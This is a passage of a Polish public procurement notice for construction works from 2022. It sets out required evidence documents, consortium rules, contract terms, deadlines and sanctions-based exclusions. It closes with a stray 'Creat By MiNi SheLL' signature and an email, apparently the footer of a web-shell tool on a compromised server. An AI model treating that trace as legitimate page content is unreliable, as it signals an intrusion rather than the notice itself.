pkt1)<br/>ppkt a).<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy działający<br/>wspólnie, mogą polegać na zdolnościach tych z wykonawców, którzy posiadają wymagane zdolności i faktycznie wykonają<br/>roboty budowlane lub usługi. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) odpisu lub informacji z<br/>Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt. 4<br/>ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub<br/>ewidencji.<br/>Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast ww. dokumentów,<br/>składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające<br/>odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł<br/>układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji<br/>wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Jeżeli w kraju, w którym<br/>Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się<br/>ww. dokumentów, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo<br/>osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub<br/>przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na<br/>siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunku dotyczącego sytuacji ekonomicznej lub finansowej Zamawiający żąda od Wykonawcy,<br/>którego ofertę oceniono najwyżej :<br/>a) dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej<br/>działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 3 000.000,00 zł.<br/> Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć dokumentów dotyczących sytuacji finansowej lub ekonomicznej<br/>wymaganych przez Zamawiającego, może złożyć inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego<br/>przez Zamawiającego warunku udziału w postępowaniu.<br/>W celu potwierdzenia spełniania warunku dotyczącego zdolności technicznej lub zawodowej Zamawiający żąda od<br/>Wykonawcy, którego ofertę oceniono najwyżej:<br/>1) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i<br/>podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały<br/>wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i<br/>prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na<br/>rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie<br/>jest w stanie uzyskać tych dokumentów - inne dokumenty. Wzór wykazu robót stanowi załącznik nr 5 do SWZ.<br/>2) wykazu osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego w tym osób odpowiedzialnych za kierowanie<br/>robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych (posiadanych uprawnień do kierowania robotami<br/>budowlanymi), a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>Wzór wykazu osób stanowi załącznik nr 6 do SWZ.<br/>Osoba, która będzie pełnić funkcję kierownika budowy musi posiadać uprawnienia budowlane wymagane obowiązującą ustawą z<br/>dnia 07 lipca 1994 r. Prawo budowlane oraz obowiązującym Rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019<br/>r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie lub odpowiadające<br/>im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.<br/>Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy<br/>mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w<br/>przepisach odrębnych. Regulację odrębną stanowią przepisy obowiązującej ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania<br/>kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty wg wzoru stanowiącego załącznik nr 1 do SWZ, wykonawca dołącza:<br/>1) aktualne na dzień składania ofert oświadczenie w zakresie wskazanym przez Zamawiającego w ogłoszeniu o zamówieniu<br/>Ogłoszenie nr 2022/BZP 00118988/01 z dnia 2022-04-12<br/>2022-04-12 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane<br/>i w Specyfikacji Warunków Zamówienia. Informacje zawarte w oświadczeniu stanowią wstępne potwierdzenie, że<br/>Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu. Wzór oświadczenia stanowi załącznik<br/>nr 3 do SWZ. Oświadczenie, o którym mowa w art. 125 ust. 1 Pzp, stanowi dowód potwierdzający brak podstaw wykluczenia<br/>i spełnianie warunków udziału w postępowaniu, na dzień składania ofert, tymczasowo zastępujący wymagane przez<br/>zamawiającego podmiotowe środki dowodowe.<br/>2) jeżeli Wykonawca przy realizacji zadania będzie korzystał z zasobów podmiotów trzecich, składa wraz z ofertą - Pisemne<br/>zobowiązanie podmiotu trzeciego do oddania Wykonawcy do dyspozycji niezbędnych zasobów przy realizacji zamówienia.<br/>Wzór zobowiązania stanowi załącznik nr 5 do SWZ;<br/>3) jeżeli ofertę podpisuje pełnomocnik, wraz z ofertą składa oryginał pełnomocnictwa do podpisania oferty. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, Zamawiający będzie<br/>żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców. Zgodnie z art. 117 ust. 4 ustawy Prawo zamówień publicznych, wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego, zobowiązani są do dołączenia do oferty oświadczenia, z którego wynika, które roboty budowlane,<br/>dostawy lub usługi wykonają poszczególni wykonawcy. Oświadczenie to, służy ustaleniu przez zamawiającego sposobu<br/>spełniania warunków udziału w postępowaniu przez wykonawców, którzy zdecydowali się na wspólne złożenie oferty w<br/>postępowaniu, w okolicznościach w których przepisy ustawy Pzp wymagają, aby wykonawcy działający wspólnie wykonali<br/>osobiście tę część zamówienia, w odniesieniu do której wykazują wymagane przez zamawiającego zdolności lub<br/>uprawnienia.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego. Wspólnicy ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia,<br/>określoną w art. 366 Kodeksu cywilnego.<br/>W przypadku wykonawców składających wspólnie ofertę Zamawiający uzna za spełnienie warunku udziału dotyczącego<br/>zdolności technicznej lub zawodowej potwierdzenie spełnienia obydwu ww. warunków przez jednego z wykonawców<br/>wspólnie składających ofertę lub łącznie przez wykonawców wspólnie składających ofertę. Zamawiający nie dopuszcza<br/>możliwości łączenia doświadczenia różnych wykonawców w celu potwierdzenia spełnienia warunku określonego w pkt1)<br/>ppkt a).<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy działający<br/>wspólnie, mogą polegać na zdolnościach tych z wykonawców, którzy posiadają wymagane zdolności i faktycznie wykonają<br/>roboty budowlane lub usługi.<br/>W przypadku wykonawców składających wspólnie ofertę Zamawiający uzna za spełnienie warunku udziału dotyczącego<br/>sytuacji ekonomicznej lub finansowej potwierdzenie spełnienia łącznie ww. warunków przez Konsorcjantów w zakresie<br/>każdego ww. warunku lub samodzielnie przez jednego z konsorcjantów. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Szczegółowy rodzaj i zakres zmian oraz warunki ich wprowadzania zostały zawarte w załączniku nr 2 do SWZ - wzór<br/>umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-13 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP ePUAP:/nowogrodziec/skrytka i udostępnionego również na miniPortaluhttps://miniportal.uzp.gov.pl/.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-13 09:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-11</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Zamawiający nie ogranicza liczby wykonawców których zaprosi do negocjacji <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> W celu zawarcia umowy w sprawie zamówienia publicznego, Wykonawca, którego ofertę wybrano, jako najkorzystniejszą<br/>przed podpisaniem umowy składa:<br/>1) pełnomocnictwo, jeżeli umowę podpisuje pełnomocnik,<br/>2) umowę regulującą współpracę Wykonawców wspólnie ubiegających się o udzielenie zamówienia, jeżeli oferta tych<br/>Wykonawców zostanie wybrana,<br/>3) kosztorysy, na podstawie których sporządzono ofertę, z wyszczególnieniem zastosowanych składników cenotwórczych.<br/>4) kopie dokumentów potwierdzających posiadanie przez Kierownika budowy oraz kierowników robót uprawnień do<br/>pełnienia samodzielnych funkcji technicznych w budownictwie spełniających wymagania opisane przepisami prawa, w tym<br/>zaświadczenie o przynależności do izby samorządu zawodowego,<br/>5) dokument potwierdzający wniesienie zabezpieczenia należytego wykonania umowy w wysokości 3% wynagrodzenia<br/>ofertowego.<br/>6) Harmonogram rzeczowo –finansowy<br/><br/>Zgodnie z art. 1 pkt3 ustawy w celu przeciwdziałania wspieraniu agresji Federacji Rosyjskiej na Ukrainę rozpoczętej w dniu 24 lutego 2022 r., wobec osób i podmiotów wpisanych na listę, o której mowa w art. 2 ustawy, stosuje się sankcje polegające m.in. na wykluczeniu z postępowania o udzielenie zamówienia publicznego lub konkursu prowadzonego na podstawie ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych (Dz. U. z 2021 r. poz. 1129, z późn. zm.), zwanej dalej „ustawą Pzp”.<br/>Na podstawie art. 7 ust. 1 ustawy z postępowania o udzielenie zamówienia publicznego lub konkursu prowadzonego na podstawie ustawy Pzp wyklucza się:<br/>1)	wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>2)	wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>3)	wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106), jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt3 ustawy.

Creat By MiNi SheLL
Email: jattceo@gmail.com